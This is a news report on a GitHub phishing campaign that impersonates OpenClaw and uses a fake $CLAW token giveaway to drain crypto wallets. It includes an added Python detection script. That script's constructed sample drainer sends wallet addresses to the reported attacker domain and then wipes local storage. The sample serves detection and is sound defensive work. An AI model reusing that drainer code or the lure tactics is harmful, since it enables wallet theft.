Cryptocurrency scammers are capitalizing on the popularity of OpenClaw to target developers through a new GitHub phishing campaign aimed at draining cryptocurrency wallets.
Summary
Attackers are impersonating OpenClaw on GitHub, creating fake accounts and tagging developers with messages offering them $5,000 in $CLAW tokens. Victims are directed to a cloned website where a malicious wallet connection prompt is used to cause wallet exfiltration. OX Security says the campaign uses obfuscated code and targeted tactics, but no confirmed victims have been reported so far.
A report published by the platform OX Security details an active phishing campaign targeting OpenClaw through a coordinated effort on GitHub. In this campaign, attackers created fake accounts, opened issue threads in attacker-controlled repositories, and tagged dozens of developers.
One such post details how a developer was approached with a message claiming to have been selected for an OpenClaw assignment, told that he had won $5,000 worth of $CLAW tokens, and was then redirected to a fake website that closely resembled openclaw.ai.
The website gives victims the option to connect their wallet through a malicious “Connect your wallet” prompt, which ultimately leads to wallet exfiltration.
The campaign surfaced as OpenClaw became a more high-profile project, especially after OpenAI CEO Sam Altman announced that OpenClaw creator Peter Steinberger would lead efforts on a personal AI agent. OpenClaw has since transitioned to an open source project run by the Foundation.
OX Security researchers said attackers may be leveraging GitHub’s star feature to identify users who have starred OpenClaw-related repositories, making them appear more targeted and trustworthy.
Fraudsters have been observed using files named “eleven.js” to embed wallet-stealing code within obfuscated JavaScript. Once triggered, the script uses built-in “nuclear” features that erase its traces from the browser’s local storage to avoid detection while continuing to track the victim’s activity.
The malware tracks user actions through commands such as PromptTx, Approved, and Declined and sends encoded data, including wallet addresses and transaction values, to a command-and-control server.
Researchers have identified at least one wallet address believed to be linked to the attackers that was used to receive the stolen funds. So far, no victims have been identified.
OX Security is urging users to block token-claw(.)xyz and watery-compost(.) starting today, and to avoid connecting their cryptocurrency wallets to newly surfaced or unverified sites.
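The behaviours described above (the PromptTx/Approved/Declined tracking commands, the local-storage wipe, the encoded beacon to a command-and-control server, and the domain OX Security recommends blocking) can be turned into a simple triage check for JavaScript pulled from a suspicious site. The following is an added example, not code from the report or from OpenClaw; the wallet-connect and obfuscation patterns and the scoring threshold are assumptions, and the sample scripts are constructed, not the real eleven.js.

```python
"""Heuristic triage of a JavaScript file for wallet-drainer indicators.

Indicators taken from the OX Security report: the tracking command names and
the token-claw(.)xyz domain. Everything else is an assumed heuristic.
"""
import re

TRACKING_COMMANDS = ("PromptTx", "Approved", "Declined")
# Defanged in the report; refang so the pattern matches real script text.
# The second domain is truncated in the report, so it is deliberately omitted.
BLOCKED_DOMAINS = ("token-claw(.)xyz".replace("(.)", "."),)

PATTERNS = {
    # Wallet connection APIs a "Connect your wallet" lure would call (assumed).
    "wallet_connect": re.compile(r"eth_requestAccounts|window\.ethereum|solana\.connect", re.I),
    # The "nuclear" clean-up of browser local storage described in the report.
    "local_storage_wipe": re.compile(r"localStorage\.(clear|removeItem)\(", re.I),
    # Common obfuscation / encoding helpers (assumed generic markers).
    "obfuscation": re.compile(r"eval\(|atob\(|btoa\(|String\.fromCharCode|\\x[0-9a-f]{2}", re.I),
    # Command names reported for the malware's action tracking (case-sensitive).
    "tracking_commands": re.compile("|".join(TRACKING_COMMANDS)),
    "blocked_domain": re.compile("|".join(re.escape(d) for d in BLOCKED_DOMAINS), re.I),
}

def scan_script(source: str) -> tuple[str, dict[str, bool]]:
    """Return ("suspicious"|"clean", per-indicator hits) for one script body."""
    hits = {name: bool(p.search(source)) for name, p in PATTERNS.items()}
    # A known-bad domain is decisive; otherwise require several behaviours to co-occur.
    suspicious = hits["blocked_domain"] or sum(hits.values()) >= 3
    return ("suspicious" if suspicious else "clean"), hits

# Constructed samples for demonstration (not the real eleven.js).
SAMPLE_DRAINER = r"""
const c2 = "https://token-claw.xyz/api";
async function go() {
  const a = await window.ethereum.request({ method: "eth_requestAccounts" });
  fetch(c2, { method: "POST", body: btoa(JSON.stringify({ cmd: "PromptTx", wallet: a[0] })) });
  localStorage.clear();
}
"""
SAMPLE_BENIGN = "document.getElementById('app').textContent = 'hello';"

if __name__ == "__main__":
    for label, src in (("drainer", SAMPLE_DRAINER), ("benign", SAMPLE_BENIGN)):
        verdict, hits = scan_script(src)
        print(label, verdict, [k for k, v in hits.items() if v])
```

A single hit such as a wallet-connect call is normal for legitimate dApps, which is why the verdict needs either the blocked domain or several behaviours together.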
Meanwhile, OpenClaw creator Peter Steinberger has enforced a strict anti-crypto policy. Mentioning cryptocurrencies throughout the project’s Discord server may lead to removal.
The decision stems from a scam that surfaced during the rebrand, in which the attackers promoted a Solana-based token called $CLAWD, and its market capitalization soared to around $16 million, only to fall more than 90% after Steinberger denied involvement.
